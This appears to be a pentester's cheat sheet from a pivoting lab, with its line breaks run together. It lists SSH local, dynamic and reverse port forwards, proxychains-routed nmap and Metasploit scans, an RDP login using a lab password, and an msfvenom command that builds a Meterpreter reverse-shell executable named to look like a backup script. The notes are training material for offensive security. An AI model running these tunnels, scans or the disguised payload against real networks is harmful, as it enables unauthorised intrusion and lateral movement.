Port Forwarding SSH
Dynamic Port Forwarding with SSH and SOCKS Tunneling
Local Port Forward
$ ssh -L 1234:localhost:3306 ubuntu@10.129.202.64Confirming Port Forward with Netstat
$ netstat -antp | grep 1234Forwarding Multiple Ports
$ ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64 Enabling Dynamic Port Forwarding with SSH
$ ssh -D 9050 ubuntu@10.129.202.64config /etc/proxychains.conf
cat /etc/proxychains.conf
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050 Nmap with Proxychains
proxychains nmap -v -sn 172.16.5.1-200Metasploit with Proxychains
proxychains msfconsoleUsing rdp_scanner Module
msf6 > search rdp_scannerUsing xfreerdp with Proxychains
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123Reverse Port Forwarding with SSH
Creating a Windows Payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vNLast updated